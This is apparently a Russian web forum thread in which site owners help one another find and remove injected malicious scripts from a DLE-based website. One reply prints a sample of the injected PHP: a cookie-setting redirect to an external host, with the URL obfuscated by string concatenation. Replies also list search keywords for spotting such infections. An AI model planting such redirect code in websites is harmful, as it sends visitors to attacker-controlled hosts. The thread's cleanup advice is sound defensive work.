Пару дней назад яндекс ругнулся, что у меня вирус. Но я его сразу не увидел, а потом случайно на рабочем компе зашел и увидел немного покривленный диз и решил глянуть что там. И как оказалось ссылка такого плана <script src=*** Я уже все перешерстил и не могу найти. Может кто сталкивался с таким. Подскажите где копать!? И еще, ссылки с некоторой переодичностью меняются.
посмотрите файл engine/data/config.php или engine/data/dbconfig.php так же может быть в engine/print.php engine/go.php engine/init.php ещё лучше проверить все файлы в папке engine/ кроме папок внутри нее.... выглядит примерно так @setcookie('m_', '1', time()+86400, '/'); @header("Location: "."h"."t"."t"."p".":"."/"."/"."u"."p"."."."c"."c"."."."c"."o"."."."i"."d"."/"."u"."/"."4"."5"."9"."0"); die(); }
На сегодняшний день код безвредный...совет: пересмотрите весь шаблон с админ панели, все подозрительные <script src=, удаляйте смело, далее переименуйте админку, закройте права на запись, и файлы заливайте только через FTP... К стати по поводу этого: посмотрите файл engine/data/config.php или engine/data/dbconfig.php так же может быть в engine/print.php engine/go.php engine/init.php ещё лучше проверить все файлы в папке engine/ кроме папок внутри нее.... выглядит примерно так посмотрите внимательно во всех файлах тег "android" внутри запросных строк, так же теги "ipad" "iphone" и другие копирующие названия популярных гаджетов, используются создателем вредоносной программы для определения на каких устройствах должен работать вирус, так как воспроизведение рекламы на гаджетах стоит дороже чем на ПК, а владельцы сайтов чаще заходят на свои сайты с ПК , в итоге вирус может долго оставаться не замеченным.Если найдете, скопируйте и оправьте мне, я вам покажу как правильно вырезать... найти тег "android" можно просто, копируете всё текстом в "нотепад" или "блокнот", далее в меню выбираете "найти далее", вводите "android" без кавычек, и если текст есть, редактор его обязательно найдет, если найдет, то всё что вокруг него на несколько строк вверх и вниз и есть вирус прокрутки рекламы для гаджетов... в данном случае дыркой является возможность загрузки аватара на сайт, то есть ава загружается с вредоносным кодом, который в дальнейшем является своего рода мостом между злоумышленником и скриптом вашего сайта...
я сталкивался. Решил проблему следующим образом: обратился в службу хостинга и откатил сайт до самого первого сохраненного у них бэкапа. А так сам долго лазил на своём сайте и в разных местах удалял код вторым способом, но это было на джумле, я просто скачал архив сайта и проверил антивирусом, а потом вручную удалял зараженные файлы с хостинга
Я уже слил весь сайт и проверил на: eval base64 android header location и подозрительного не нашел ничего... Писал хостингу, он проверил на вирусы и сказал, что все в порядке и от соседей тоже не мог влезть. Какие еще могут быть варианты??? У меня уже мозг плавится... --- добавлено: 5 июн 2013 в 11:39 --- УРА!!!! /site/engine/modules/calendar.php Было вот это: Без слешов
Поменяй пароли и переименуй админку. А иногда бывает гораздо проще: ваш сайт ссылается на вирусный сайт и яндекс тоже считает, что ваш сайт заражен
самое главное выставить правильные права на папки и файлы, что бы исключить возможность запихнуть в них какой то код и левые файлы, ну и естественно проверять те моды и шаблоны, которые устанавливаете
Да причем тут "что последнее ставили на сайт , могли не через него залить , а через его соседей , а там могли и порутать сервак или просто хватило прав на его домен залиться и всё... пускай пишет в тех поддержку, а те в свою очередь "п@дики-ленивые" пускай уже подымают логи и смотрят...
